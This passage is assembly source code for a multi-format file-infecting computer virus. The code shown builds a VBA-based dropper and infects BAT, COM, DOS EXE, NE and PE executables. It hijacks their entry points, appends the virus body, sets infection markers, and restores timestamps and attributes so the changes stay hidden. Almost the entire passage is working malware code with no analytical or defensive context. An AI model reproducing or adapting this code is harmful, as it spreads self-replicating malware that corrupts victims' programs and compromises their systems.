|
|||
|
mov eax, "rA=a" ; add string "a=Array("
|
|||
|
stosd
|
|||
|
mov eax, "(yar"
|
|||
|
stosd
|
|||
|
|
|||
|
mov ecx, 128 ; ECX=numbers in one line
|
|||
|
|
|||
|
build_nubers_loop:
|
|||
|
push ecx ; save ECX
|
|||
|
|
|||
|
xor eax, eax ; EAX=0
|
|||
|
lodsb ; AL=one byte from dropper
|
|||
|
mov ecx, 3 ; ECX=3 (nuber of digits)
|
|||
|
|
|||
|
number_loop_head:
|
|||
|
xor edx, edx ; EDX=0 (high dword for div)
|
|||
|
mov ebx, 10 ; EBX=10
|
|||
|
div ebx ; EDX=mod, EAX=div
|
|||
|
add dl, '0' ; DL=one digit
|
|||
|
push edx ; save it
|
|||
|
LOOP number_loop_head
|
|||
|
|
|||
|
pop eax ; AL=one digit
|
|||
|
stosb ; store it
|
|||
|
pop eax ; AL=next digit
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
stosb
|
|||
|
mov al, ',' ; store a comma
|
|||
|
stosb
|
|||
|
|
|||
|
pop ecx ; ECX=number of bytes left
|
|||
|
LOOP build_nubers_loop
|
|||
|
|
|||
|
dec edi
|
|||
|
|
|||
|
mov eax, ")" + 0A0D00h + "w"*1000000h ; add ")CRLFwCRLF"
|
|||
|
stosd
|
|||
|
mov ax, 0A0Dh
|
|||
|
stosw
|
|||
|
|
|||
|
pop ecx ; restore number of lines left
|
|||
|
LOOP build_lines_loop
|
|||
|
|
|||
|
push esi ; save ESI
|
|||
|
|
|||
|
lea esi, [ebp+offset end_sub] ; store an "end sub"
|
|||
|
movsd ; move 9 bytes
|
|||
|
movsd
|
|||
|
movsb
|
|||
|
|
|||
|
pop esi ; restore ESI
|
|||
|
|
|||
|
inc byte ptr [ebp+sub_name] ; new name for next sub
|
|||
|
|
|||
|
pop ecx ; ECX=number of lines left
|
|||
|
or ecx, ecx
|
|||
|
JNZ build_subs_loop
|
|||
|
|
|||
|
|
|||
|
sub edi, [ebp+mapbase] ; EDI=size of VBA code
|
|||
|
mov [ebp+filesize], edi ; save it as filesize
|
|||
|
|
|||
|
call closemap ; close the map/file
|
|||
|
|
|||
|
push [ebp+heap_buffer] ; free allocated memory
|
|||
|
call [ebp+GlobalFree]
|
|||
|
|
|||
|
failure:
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT FILE ---------------------------------------------------------
|
|||
|
infect:
|
|||
|
push edi
|
|||
|
|
|||
|
xor eax, eax ; EAX=0
|
|||
|
mov ecx, eax ; ECX=0
|
|||
|
dec ecx ; ECX=0FFFFFFFFh
|
|||
|
cld ; clear direction flag
|
|||
|
repne scasb ; search for end of filename
|
|||
|
|
|||
|
mov eax, [edi-5] ; EAX=filename extension
|
|||
|
or eax, 20202020h ; make it lowercase
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
cmp eax, "exe." ; EXE file?
|
|||
|
JE infect_exe_com
|
|||
|
cmp eax, "moc." ; COM file?
|
|||
|
JE infect_exe_com
|
|||
|
cmp eax, "tab." ; BAT file?
|
|||
|
JNE quit_infect_error
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT BAT FILE -----------------------------------------------------
|
|||
|
|
|||
|
infect_bat:
|
|||
|
call openfile ; open and map the victim
|
|||
|
JC quit_infect_error ; opening/mapping failed ?
|
|||
|
|
|||
|
xchg edi, eax ; EDI=start of memmap
|
|||
|
add edi, [ebp + offset filesize] ; EDI=end of file in memmap
|
|||
|
cmp byte ptr [edi-1], 0 ; already infected?
|
|||
|
JE already_infected
|
|||
|
lea esi, [ebp + offset bat_virus_code] ; ESI=BAT code to add
|
|||
|
mov ecx, size_bat_virus_code
|
|||
|
cld
|
|||
|
rep movsb ; add BAT code
|
|||
|
call create_dropper ; add PE dropper as overlay
|
|||
|
add dword ptr [ebp + offset filesize], (size_bat_virus_code+dropper_size)
|
|||
|
JMP abort_infection
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT A EXE OR COM FILE --------------------------------------------
|
|||
|
|
|||
|
infect_exe_com:
|
|||
|
call openfile ; open and map the victim
|
|||
|
JC quit_infect_error ; opening/mapping failed ?
|
|||
|
|
|||
|
cmp word ptr [eax], "ZM" ; has it a MZ header?
|
|||
|
JE infect_exe
|
|||
|
cmp word ptr [eax], "MZ" ; has it a MZ header?
|
|||
|
JE infect_exe
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT COM FILE -----------------------------------------------------
|
|||
|
|
|||
|
infect_com:
|
|||
|
mov ecx, [ebp+offset filesize] ; ECX=size of victim file
|
|||
|
mov esi, ecx
|
|||
|
dec esi
|
|||
|
add esi, [ebp+offset mapbase] ; ESI=end of file in memmap
|
|||
|
mov edi, esi
|
|||
|
add edi, 32
|
|||
|
std
|
|||
|
rep movsb ; shift whole file back
|
|||
|
|
|||
|
lea esi, [ebp+offset new_mz_header] ; prepend the MZ header
|
|||
|
mov edi, [ebp+offset mapbase]
|
|||
|
mov ebx, new_mz_header_size
|
|||
|
call decompress
|
|||
|
|
|||
|
mov eax, [ebp+offset filesize] ; update filesize
|
|||
|
add eax, 32
|
|||
|
mov [ebp+filesize], eax
|
|||
|
mov ebx, [ebp+offset mapbase]
|
|||
|
|
|||
|
cmp word ptr [eax+ebx-4], "SN" ; ENUNS check
|
|||
|
JNE no_enun
|
|||
|
add word ptr [eax+ebx-2], 1234h ; fix ENUNS shit
|
|||
|
org $-2 ; otherwise TASM will give a
|
|||
|
dw (((size_dos_virus_code+15+dropper_size)/16)*16); warning, dunno why
|
|||
|
sub eax, 7 ; make the ENUNS an overlay
|
|||
|
no_enun:
|
|||
|
xor edx, edx ; calculate filesize for
|
|||
|
mov ecx, 512 ; MZ header
|
|||
|
div ecx
|
|||
|
or edx, edx ; mod
|
|||
|
JZ no_page_roundup
|
|||
|
inc eax ; div
|
|||
|
no_page_roundup:
|
|||
|
mov [ebx+2], edx
|
|||
|
mov [ebx+4], eax
|
|||
|
xchg eax, ebx
|
|||
|
; now infect it as regular EXE
|
|||
|
|
|||
|
; ----- EXE FILE INFECTION --------------------------------------------------
|
|||
|
|
|||
|
infect_exe:
|
|||
|
cmp word ptr [eax+12h], "JB" ; already infected?
|
|||
|
JE already_infected
|
|||
|
mov word ptr [eax+12h], "JB" ; mark as infectd
|
|||
|
|
|||
|
cmp word ptr [eax+18h], 40h
|
|||
|
JE new_exe
|
|||
|
|
|||
|
|
|||
|
; ----- DOS EXE INFECTION ---------------------------------------------------
|
|||
|
|
|||
|
dos_exe:
|
|||
|
mov bx, [eax+0Eh] ; save relo_SS
|
|||
|
mov [ebp+relo_SS], bx
|
|||
|
mov bx, [eax+10h] ; save SP_start
|
|||
|
mov [ebp+SP_start], bx
|
|||
|
mov bx, [eax+14h] ; save IP_start
|
|||
|
mov [ebp+IP_start], bx
|
|||
|
mov bx, [eax+16h] ; save relo_CS
|
|||
|
mov [ebp+relo_CS], bx
|
|||
|
|
|||
|
movzx ebx, word ptr [eax+2] ; calculate internal filesize
|
|||
|
movzx ecx, word ptr [eax+4]
|
|||
|
or ebx, ebx
|
|||
|
JZ no_page_round
|
|||
|
dec ecx
|
|||
|
no_page_round:
|
|||
|
mov eax, 512
|
|||
|
mul ecx
|
|||
|
add eax, ebx
|
|||
|
mov [ebp+offset dos_exe_size], eax
|
|||
|
cmp [ebp+offset filesize], eax ; has it an internal overlay?
|
|||
|
JE no_internal_overlays
|
|||
|
|
|||
|
with_overlay:
|
|||
|
mov esi, [ebp+offset mapbase]
|
|||
|
cmp dword ptr [eax+esi], "VOBF" ; internal overlay of borland?
|
|||
|
JE infectable_overlay
|
|||
|
cmp word ptr [eax+esi+3], "SN" ; ENUNS COM file converted
|
|||
|
; by us before?
|
|||
|
JNE abort_infection
|
|||
|
|
|||
|
infectable_overlay:
|
|||
|
mov ecx, [ebp+filesize] ; shift internal overlay back
|
|||
|
mov esi, ecx
|
|||
|
sub ecx, eax
|
|||
|
dec esi
|
|||
|
add esi, [ebp+mapbase]
|
|||
|
mov edi, esi
|
|||
|
add edi, (((size_dos_virus_code+15+dropper_size)/16)*16)
|
|||
|
std
|
|||
|
rep movsb
|
|||
|
|
|||
|
no_internal_overlays:
|
|||
|
add dword ptr [ebp+filesize], (((size_dos_virus_code+15+dropper_size)/16)*16)
|
|||
|
add dword ptr [ebp+dos_exe_size], (((size_dos_virus_code+15+dropper_size)/16)*16)
|
|||
|
|
|||
|
mov ebx, [ebp+mapbase]
|
|||
|
mov edi, eax
|
|||
|
add edi, ebx
|
|||
|
lea esi, [ebp+offset dos_virus_code]
|
|||
|
mov ecx, size_dos_virus_code
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
call create_dropper
|
|||
|
|
|||
|
xor edx, edx
|
|||
|
mov ecx, 16
|
|||
|
div ecx ; EDX:EAX / ECX
|
|||
|
; EAX=DIV, EDX=MOD
|
|||
|
|
|||
|
sub ax, [ebx+08h] ; size of header (paragr)
|
|||
|
; EAX=virus segment
|
|||
|
|
|||
|
mov word ptr [ebx+0Eh], ax ; new relo_SS
|
|||
|
mov word ptr [ebx+10h], 6000h ; new SP_start
|
|||
|
mov word ptr [ebx+14h], dx ; new IP_start
|
|||
|
mov word ptr [ebx+16h], ax ; new relo_CS
|
|||
|
|
|||
|
mov eax, [ebp+dos_exe_size]
|
|||
|
xor edx, edx
|
|||
|
mov ecx, 512
|
|||
|
div ecx
|
|||
|
or edx, edx ; mod
|
|||
|
JZ no_page_roundup_
|
|||
|
inc eax ; div
|
|||
|
no_page_roundup_:
|
|||
|
mov [ebx+2], dx
|
|||
|
mov [ebx+4], ax
|
|||
|
|
|||
|
JMP abort_infection
|
|||
|
|
|||
|
|
|||
|
; ----- IT IS A NEW EXE FILE ------------------------------------------------
|
|||
|
|
|||
|
new_exe:
|
|||
|
mov ebx, [eax+3Ch] ; EBX=new header offset
|
|||
|
add ebx, eax ; EBX=new header in memmap
|
|||
|
|
|||
|
cmp dword ptr [ebx], "EP" ; PE file?
|
|||
|
JE infect_PE
|
|||
|
|
|||
|
cmp word ptr [ebx], "EN" ; NE file?
|
|||
|
JNE abort_infection
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT A NE EXE FILE ------------------------------------------------
|
|||
|
|
|||
|
infect_NE:
|
|||
|
mov edi, [ebp+offset filename_ofs]
|
|||
|
mov esi, edi
|
|||
|
|
|||
|
search_pure_filename:
|
|||
|
cmp byte ptr [edi], "\"
|
|||
|
JNE no_backslash
|
|||
|
mov esi, edi
|
|||
|
no_backslash:
|
|||
|
cmp byte ptr [edi], 0
|
|||
|
JE found_end_filename
|
|||
|
inc edi
|
|||
|
JMP search_pure_filename
|
|||
|
|
|||
|
found_end_filename:
|
|||
|
inc esi
|
|||
|
lea edi, [ebp+offset our_filename]
|
|||
|
cld
|
|||
|
movsd
|
|||
|
movsd
|
|||
|
movsd
|
|||
|
|
|||
|
xchg ebx, eax
|
|||
|
|
|||
|
mov cx, [eax+32h] ; CX=align shift
|
|||
|
or cx, cx ; align shift zero?
|
|||
|
JNZ align_ok ; if not, it's alright
|
|||
|
mov cx, 9 ; if so, use default (512 byt)
|
|||
|
align_ok:
|
|||
|
or ch, ch ; alignment too big?
|
|||
|
JNZ abort_infection ; if so, then close
|
|||
|
mov [ebp+offset shift_value], cl ; store align shift value
|
|||
|
mov [ebp+offset shift_value2], cl ; store again shift value
|
|||
|
|
|||
|
mov ebx, size_NE_virus_code ; EBX=virus length
|
|||
|
shr ebx, cl
|
|||
|
inc ebx ; EBX=aligned length
|
|||
|
shl ebx, cl
|
|||
|
|
|||
|
movzx esi, word ptr [eax+24h] ; ESI=resource table in file
|
|||
|
add esi, eax ; ESI=resource table in map
|
|||
|
cmp cx, [esi] ; file align=resource align?
|
|||
|
JNE abort_infection ; if not, then close
|
|||
|
|
|||
|
inc esi ; esi=1st TypeInfo
|
|||
|
inc esi
|
|||
|
|
|||
|
mov [ebp+offset resource_table], esi ; save start of resource table
|
|||
|
|
|||
|
movzx edx, word ptr [eax+16h] ; EDX=number of code sect.
|
|||
|
dec edx ; count starts with one
|
|||
|
shl edx, 3 ; 1 sect. header=8 bytes
|
|||
|
movzx ecx, word ptr [eax+22h] ; ECX=start of segment table
|
|||
|
add edx, ecx ; EDX=segment header in file
|
|||
|
add edx, eax ; EDX=segment header of start
|
|||
|
; code segment in mapped mem
|
|||
|
|
|||
|
movzx ecx, word ptr [edx+2] ; ECX=segment size in file
|
|||
|
or ecx, ecx ; 64K segment?
|
|||
|
JZ abort_infection ; if so, exit
|
|||
|
cmp [edx+6], cx ; cmp with size in mem
|
|||
|
JNE abort_infection ; exit if not equal
|
|||
|
|
|||
|
push word ptr [eax+14h] ; save old start ip
|
|||
|
pop word ptr [ebp+offset NE_start_IP]
|
|||
|
mov [eax+14h], cx ; set new one
|
|||
|
|
|||
|
add [edx+2], bx ; fixup physical segment size
|
|||
|
add [edx+6], bx ; fixup virtual segment size
|
|||
|
|
|||
|
movzx edi, word ptr [edx] ; start of segment in file
|
|||
|
|
|||
|
push ecx
|
|||
|
mov cl, [ebp+offset shift_value]
|
|||
|
shl edi, cl ; start of segment in bytes
|
|||
|
pop ecx
|
|||
|
|
|||
|
add edi, ecx ; add size of segment
|
|||
|
mov esi, [ebp+offset filesize]
|
|||
|
mov ecx, esi
|
|||
|
sub ecx, edi ; length to move
|
|||
|
dec esi
|
|||
|
add esi, [ebp+offset mapbase]
|
|||
|
push edi ; save virus start
|
|||
|
|
|||
|
add [ebp+offset filesize], ebx ; fixup filesize
|
|||
|
|
|||
|
mov edi, esi
|
|||
|
add edi, ebx
|
|||
|
std
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop edi
|
|||
|
push edi
|
|||
|
add edi, [ebp+offset mapbase]
|
|||
|
lea esi, [ebp+offset NE_virus_code]
|
|||
|
mov ecx, ebx
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop edx ; EDX=virus start in file
|
|||
|
|
|||
|
mov cl, [ebp+offset shift_value]
|
|||
|
shr ebx, cl ; EBX=virus size in alignment units
|
|||
|
|
|||
|
movzx esi, word ptr [eax+22h] ; start of segment table
|
|||
|
add esi, eax ; ESI=segment table in map
|
|||
|
movzx ecx, word ptr [eax+1Ch] ; ECX=number of segments
|
|||
|
|
|||
|
segment_loop_head:
|
|||
|
movzx eax, word ptr [esi] ; EAX=offset of resource
|
|||
|
db 0C1h, 0E0h ; shl eax, imm8
|
|||
|
shift_value db ?
|
|||
|
cmp eax, edx ; resource ofs > virus start?
|
|||
|
JL segment_ok
|
|||
|
add word ptr [esi], bx ; fix up resource offset
|
|||
|
segment_ok:
|
|||
|
add esi, 8
|
|||
|
LOOP segment_loop_head
|
|||
|
|
|||
|
|
|||
|
mov esi, [ebp+offset resource_table]
|
|||
|
|
|||
|
resources_loop_head:
|
|||
|
cmp word ptr [esi], 0 ; end of TypeInfo table?
|
|||
|
JE done_resources
|
|||
|
|
|||
|
movzx ecx, word ptr [esi+2] ; Resource count
|
|||
|
lea edi, [esi+8] ; NameInfo Array
|
|||
|
|
|||
|
NameInfo_loop_head:
|
|||
|
movzx eax, word ptr [edi] ; EAX=offset of resource
|
|||
|
db 0C1h, 0E0h ; shl eax, imm8
|
|||
|
shift_value2 db ?
|
|||
|
|
|||
|
cmp eax, edx ; resource ofs > virus start?
|
|||
|
JL resource_ok
|
|||
|
add word ptr [edi], bx ; fix up resource offset
|
|||
|
resource_ok:
|
|||
|
add edi, 12
|
|||
|
LOOP NameInfo_loop_head
|
|||
|
|
|||
|
mov esi, edi
|
|||
|
JMP resources_loop_head
|
|||
|
done_resources:
|
|||
|
|
|||
|
mov edi, [ebp + offset mapbase]
|
|||
|
add edi, [ebp + offset filesize]
|
|||
|
call create_dropper
|
|||
|
add dword ptr [ebp + offset filesize], dropper_size
|
|||
|
|
|||
|
JMP abort_infection
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT A PE EXE FILE ------------------------------------------------
|
|||
|
|
|||
|
infect_PE:
|
|||
|
push ebx ; save PE header pointer
|
|||
|
|
|||
|
call append_PE ; modify last sect. for virus
|
|||
|
|
|||
|
mov ebx, [ebp+offset virus_RVA] ; EBX=RVA of virus in victim
|
|||
|
xchg ebx, [eax+28h] ; set as new entrypoint, save
|
|||
|
; old entryRVA in EBX
|
|||
|
mov ecx, [eax+34h] ; ECX=imagebase
|
|||
|
mov [ebp+offset imagebase], ecx ; save it
|
|||
|
add ebx, ecx ; EBX=entry VA
|
|||
|
mov [ebp+orig_eip], ebx ; save it
|
|||
|
|
|||
|
pop ebx ; EBX=PE header pointer
|
|||
|
|
|||
|
call finish_PE_infection ; append virus, recalc CRC
|
|||
|
|
|||
|
already_infected:
|
|||
|
abort_infection:
|
|||
|
call closemap ; close filemap and file
|
|||
|
quit_infect_error:
|
|||
|
RET
|
|||
|
|
|||
|
; ----- END INFECT FILE -----------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
openfile:
|
|||
|
mov [ebp+offset filename_ofs], edx
|
|||
|
|
|||
|
push edx ; offset filename
|
|||
|
call [ebp+offset GetFileAttributesA]
|
|||
|
mov [ebp+attributes], eax
|
|||
|
inc eax
|
|||
|
JNZ get_attribs_ok
|
|||
|
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
get_attribs_ok:
|
|||
|
push 80h ; normal attributes
|
|||
|
push dword ptr [ebp+offset filename_ofs]
|
|||
|
call [ebp+offset SetFileAttributesA]
|
|||
|
or eax, eax
|
|||
|
JNZ kill_attribs_ok
|
|||
|
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
kill_attribs_ok:
|
|||
|
push 0 ; template file (shit)
|
|||
|
push 80h ; file attributes (normal)
|
|||
|
push 3 ; open existing
|
|||
|
push 0 ; security attributes (shit)
|
|||
|
push 0 ; do not share file
|
|||
|
push 0C0000000h ; read/write mode
|
|||
|
push dword ptr [ebp+offset filename_ofs] ; pointer to filename
|
|||
|
call [ebp+offset CreateFileA]
|
|||
|
mov [ebp+filehandle], eax
|
|||
|
inc eax ; EAX= -1 (Invalid handle val)
|
|||
|
JNZ open_ok
|
|||
|
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
open_ok:
|
|||
|
lea eax, [ebp+offset LastWriteTime]
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset GetFileTime]
|
|||
|
or eax, eax
|
|||
|
JNZ get_time_ok
|
|||
|
|
|||
|
call closefile
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
get_time_ok:
|
|||
|
push 0 ; high filesize dword ptr
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset GetFileSize]
|
|||
|
mov [ebp+offset filesize], eax
|
|||
|
inc eax
|
|||
|
JNZ get_filesize_ok
|
|||
|
|
|||
|
call closefile
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
get_filesize_ok:
|
|||
|
add eax, workspace-1
|
|||
|
JMP mapfile
|
|||
|
|
|||
|
|
|||
|
|
|||
|
createfile:
|
|||
|
mov [ebp+offset filename_ofs], edx
|
|||
|
|
|||
|
push 0 ; template file (shit)
|
|||
|
push 80h ; file attributes (normal)
|
|||
|
push 1 ; create new file (failure if
|
|||
|
; old one exists)
|
|||
|
push 0 ; security attributes (shit)
|
|||
|
push 0 ; do not share file
|
|||
|
push 0C0000000h ; read/write mode
|
|||
|
push edx ; pointer to filename
|
|||
|
call [ebp+offset CreateFileA]
|
|||
|
mov [ebp+offset filehandle], eax
|
|||
|
inc eax ; EAX= -1 (Invalid handle val)
|
|||
|
JNZ createfile_ok
|
|||
|
|
|||
|
stc
|
|||
|
RET
|
|||
|
createfile_ok:
|
|||
|
mov dword ptr [ebp+offset attributes], 80h
|
|||
|
|
|||
|
lea edi, [ebp+offset CreationTime]
|
|||
|
xor eax, eax
|
|||
|
mov ecx, 6
|
|||
|
rep stosw
|
|||
|
|
|||
|
mov [ebp+offset filesize], ecx ; filesize=0
|
|||
|
mov eax, workspace
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mapfile:
|
|||
|
push 0 ; name file mapping obj (shit)
|
|||
|
push eax ; low dword of filesize
|
|||
|
push 0 ; high dword of filesize
|
|||
|
push 4 ; PAGE_READWRITE
|
|||
|
push 0 ; security attributes (shit)
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset CreateFileMappingA]
|
|||
|
mov [ebp+offset maphandle], eax
|
|||
|
or eax, eax ; close?
|
|||
|
JNZ createfilemapping_ok
|
|||
|
|
|||
|
call closefile
|
|||
|
stc
|
|||
|
RET
|
|||
|
|
|||
|
createfilemapping_ok:
|
|||
|
push 0 ; map the whole file
|
|||
|
push 0 ; low dword of fileoffset
|
|||
|
push 0 ; high dword of fileoffset
|
|||
|
push 2 ; read/write access
|
|||
|
push dword ptr [ebp+offset maphandle]
|
|||
|
call [ebp+offset MapViewOfFile]
|
|||
|
mov [ebp+offset mapbase], eax
|
|||
|
or eax, eax
|
|||
|
JNZ mapfile_ok
|
|||
|
|
|||
|
call closemaphandle
|
|||
|
stc
|
|||
|
RET
|
|||
|
|
|||
|
mapfile_ok:
|
|||
|
push eax
|
|||
|
xchg edi, eax
|
|||
|
add edi, [ebp+offset filesize]
|
|||
|
xor eax, eax
|
|||
|
mov ecx, workspace
|
|||
|
rep stosb
|
|||
|
|
|||
|
pop eax
|
|||
|
clc
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
closemap:
|
|||
|
push dword ptr [ebp+offset mapbase]
|
|||
|
call [ebp+offset UnmapViewOfFile]
|
|||
|
|
|||
|
closemaphandle:
|
|||
|
push dword ptr [ebp+offset maphandle]
|
|||
|
call [ebp+offset CloseHandle]
|
|||
|
|
|||
|
push 0 ; move relative to start of file
|
|||
|
push 0 ; high word pointer of file offset
|
|||
|
push dword ptr [ebp+offset filesize]
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset SetFilePointer]
|
|||
|
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset SetEndOfFile]
|
|||
|
|
|||
|
closefile:
|
|||
|
lea eax, [ebp+offset LastWriteTime]
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
sub eax, 8
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset SetFileTime]
|
|||
|
|
|||
|
push dword ptr [ebp+offset filehandle]
|
|||
|
call [ebp+offset CloseHandle]
|
|||
|
|
|||
|
push dword ptr [ebp+offset attributes]
|
|||
|
push dword ptr [ebp+offset filename_ofs]
|
|||
|
call [ebp+offset SetFileAttributesA]
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- MODIFY PE FILE LAST SECTION/IMAGESIZE FOR INFECTION -----------------
|
|||
|
|
|||
|
append_PE:
|
|||
|
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
|
|||
|
dec ecx ; ECX=number of last section
|
|||
|
|
|||
|
push ebx ; save PE header offset
|
|||
|
|
|||
|
movzx edx, word ptr [ebx+14h] ; EDX=size of optional header
|
|||
|
add ebx, edx ; add size of optional header
|
|||
|
add ebx, 18h ; add size of file header
|
|||
|
; EBX=first section header
|
|||
|
|
|||
|
xor edx, edx ; EDX=0
|
|||
|
mov eax, 40 ; EAX=size of one sect.header
|
|||
|
mul ecx ; EAX=size of n-1 sect.headers
|
|||
|
add ebx, eax ; EBX=last sect.header pointer
|
|||
|
|
|||
|
pop eax ; EAX=PE header pointer
|
|||
|
|
|||
|
or dword ptr [ebx+24h], 0E0000020h ; modify last section flags:
|
|||
|
; read, write, exec, code
|
|||
|
|
|||
|
mov ecx, [ebx+8h] ; ECX=VirtualSize of last sect
|
|||
|
|
|||
|
or ecx, ecx ; VirtualSize=0 ?
|
|||
|
JNZ VirtualSize_OK ; if not, it's ok
|
|||
|
mov ecx, [ebx+10h] ; if yes, it means that
|
|||
|
; VirtualSize=SizeOfRawData
|
|||
|
VirtualSize_OK:
|
|||
|
mov edx, ecx ; EDX=last sect. VirtualSize
|
|||
|
add edx, [ebx+14h] ; add PointerToRawData
|
|||
|
add edx, [ebp+mapbase] ; add start of memmap
|
|||
|
mov [ebp+offset virus_start], edx ; save start of virus in map
|
|||
|
mov edx, ecx ; EDX=VirtualSize
|
|||
|
add edx, [ebx+0Ch] ; add VirtualAddress
|
|||
|
mov [ebp+offset virus_RVA], edx ; save virus RVA
|
|||
|
add ecx, virus_size ; ECX=new section size
|
|||
|
push ecx ; save it
|
|||
|
mov [ebx+8h], ecx ; set it as new VirtualSize
|
|||
|
mov edx, [eax+3Ch] ; EDX=filealign
|
|||
|
call align_ECX ; align physical sect. size
|
|||
|
mov [ebx+10h], ecx ; save it as new SizeOfRawData
|
|||
|
add ecx, [ebx+14h] ; add PointerToRawData
|
|||
|
mov [ebp+filesize], ecx ; save it as new file size
|
|||
|
pop ecx ; ECX=new section size
|
|||
|
add ecx, [ebx+0Ch] ; ECX=new imagesize
|
|||
|
mov edx, [eax+38h] ; EDX=SectionAlign
|
|||
|
call align_ECX ; align the new imagesize
|
|||
|
mov [eax+50h], ecx ; set it as new image size
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- MOVE VIRUS BODY AND RECALCULATE CHECKSUM ----------------------------
|
|||
|
|
|||
|
finish_PE_infection:
|
|||
|
|
|||
|
lea esi, [ebp+start] ; ESI=start of virus body
|
|||
|
mov edi, [ebp+virus_start] ; EDI=virus place in victim
|
|||
|
mov ecx, virus_size ; ECX=size of virus
|
|||
|
rep movsb ; copy virusbody to filemap
|
|||
|
|
|||
|
add ebx, 58h ; EBX=PE checksum in map
|
|||
|
cmp dword ptr [ebx], 0 ; checksummed file?
|
|||
|
JE end_finish_PE_infection ; if not, we are done
|
|||
|
|
|||
|
lea eax, [ebp+offset imagehlp_dll] ; EAX=ptr to "IMAGEHLP.DLL"
|
|||
|
push eax
|
|||
|
call [ebp+offset LoadLibraryA] ; load IMAGEHLP.DLL
|
|||
|
or eax, eax ; EAX=0 means we failed
|
|||
|
JZ end_finish_PE_infection
|
|||
|
|
|||
|
push ebx ; save pointer to old CRC
|
|||
|
|
|||
|
lea esi, [ebp+offset CheckSumMappedFile] ; get the CheckSumMappedFile
|
|||
|
call My_GetProcAddress ; API
|
|||
|
|
|||
|
pop ebx ; restore pointer to old CRC
|
|||
|
JC end_finish_PE_infection
|
|||
|
|
|||
|
mov ecx, [edx+eax] ; ECX=API RVA
|
|||
|
add eax, ecx ; ECX=API VA
|
|||
|
|
|||
|
push ebx ; old CRC pointer
|
|||
|
lea ebx, [ebp+dummy_dword]
|
|||
|
push ebx ; place to store old CRC
|
|||
|
push dword ptr [ebp+filesize] ; size of file
|
|||
|
push dword ptr [ebp+mapbase] ; mapbase
|
|||
|
call eax ; call CheckSumMappedFile
|
|||
|
|
|||
|
end_finish_PE_infection:
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- GetAPIs -------------------------------------------------------------
|
|||
|
; EAX=Module Base Address
|
|||
|
; ECX=Number of APIs
|
|||
|
; ESI=pointer to names table
|
|||
|
; EDI=pointer to addresses table
|
|||
|
|
|||
|
GetAPIs:
|
|||
|
get_APIs_loop:
|
|||
|
push ecx ; save number of APIs
|
|||
|
push eax ; save module base address
|
|||
|
push edi ; save pointer to address tbl
|
|||
|
|
|||
|
call My_GetProcAddress ; get RVA of RVA of one API
|
|||
|
|
|||
|
pop edi ; EDI=where to store the RVAs
|
|||
|
mov ecx, [edx+eax] ; ECX=API RVA
|
|||
|
add eax, ecx ; EAX=API VA
|
|||
|
stosd ; store the API VA
|
|||
|
|
|||
|
next_API_loop:
|
|||
|
inc esi ; go to next byte
|
|||
|
cmp byte ptr [esi], 0 ; reached end of API name?
|
|||
|
JNE next_API_loop ; if not, search on
|
|||
|
inc esi ; ESI=next API name
|
|||
|
|
|||
|
pop eax ; EAX=module base address
|
|||
|
pop ecx ; ECX=number of APIs left
|
|||
|
LOOP get_APIs_loop ; get the next API
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- My_GetProcAddress ---------------------------------------------------
|
|||
|
; input:
|
|||
|
; EAX=module base address
|
|||
|
; ESI=API function name
|
|||
|
; output:
|
|||
|
; EDX=RVA of RVA of API function
|
|||
|
|
|||
|
My_GetProcAddress:
|
|||
|
mov ebx, eax ; EBX=module base address
|
|||
|
add ebx, [eax+3Ch] ; EBX=new exe header
|
|||
|
mov ebx, [ebx+78h] ; EBX=export directory RVA
|
|||
|
add ebx, eax ; EBX=export directory VA
|
|||
|
xor ecx, ecx ; ECX=0 (counter)
|
|||
|
mov edx, [ebx+18h] ; EDX=NumberOfNames
|
|||
|
mov edi, [ebx+20h] ; EDI=AddressOfNames array RVA
|
|||
|
add edi, eax ; EDI=AddressOfNames array VA
|
|||
|
|
|||
|
search_loop:
|
|||
|
pusha ; save all registers
|
|||
|
mov edi, [edi+ecx*4] ; EDI=RVA of current API name
|
|||
|
add edi, eax ; EDI=VA of current API name
|
|||
|
|
|||
|
cmp_loop:
|
|||
|
lodsb ; get a byte from our API name
|
|||
|
cmp byte ptr [edi], al ; is this byte equal?
|
|||
|
JNE search_on_API ; if not, this isn't our API
|
|||
|
inc edi ; compare next byte
|
|||
|
or al, al ; reached end of API name ?
|
|||
|
